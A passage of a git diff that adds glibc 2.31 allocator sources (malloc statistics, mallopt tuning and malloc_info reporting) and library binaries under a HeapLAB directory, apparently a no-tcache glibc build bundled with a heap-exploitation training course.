+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static __always_inline int
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static __always_inline int
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static __always_inline int
+do_set_tcache_max (size_t value)
+{
+  if (value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_tcache_count (size_t value)
+{
+  if (value <= MAX_TCACHE_COUNT)
+    {
+      LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+      mp_.tcache_count = value;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+static inline int
+__always_inline
+do_set_mxfast (size_t value)
+{
+  if (value <= MAX_FAST_SIZE)
+    {
+      LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+      set_max_fast (value);
+      return 1;
+    }
+  return 0;
+}
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  /* Many of these helper functions take a size_t.  We do not worry
+     about overflow here, because negative int values will wrap to
+     very large size_t values and the helpers have sufficient range
+     checking for such conversions.  Many of these helpers are also
+     used by the tunables macros in arena.c.  */
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      res = do_set_mxfast (value);
+      break;
+
+    case M_TRIM_THRESHOLD:
+      res = do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      res = do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      res = do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      res = do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      res = do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	res = do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	res = do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      /* Account for top chunk.  The top-most available chunk is
+	 treated specially and is never in any bin. See "initial_top"
+	 comments.  */
+      avail = chunksize (ar_ptr->top);
+      nblocks = 1;  /* Top always exists.  */
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "\
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.31_no-tcache/ld-2.31.so b/HeapLAB/.glibc/glibc_2.31_no-tcache/ld-2.31.so
new file mode 100755
index 0000000..1513383
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.31_no-tcache/ld-2.31.so differ
diff --git a/HeapLAB/.glibc/glibc_2.31_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.31_no-tcache/ld.so.2
new file mode 120000
index 0000000..2e1e932
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.31.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.31_no-tcache/libc-2.31.so b/HeapLAB/.glibc/glibc_2.31_no-tcache/libc-2.31.so
new file mode 100755
index 0000000..6711df5
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.31_no-tcache/libc-2.31.so differ
diff --git a/HeapLAB/.glibc/glibc_2.31_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.31_no-tcache/libc.so.6
new file mode 120000
index 0000000..524d6c6
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.31.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.31_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.31_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..f7cd29b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.31_no-tcache/malloc/malloc.c
@@ -0,0 +1,5610 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2020 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <https://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
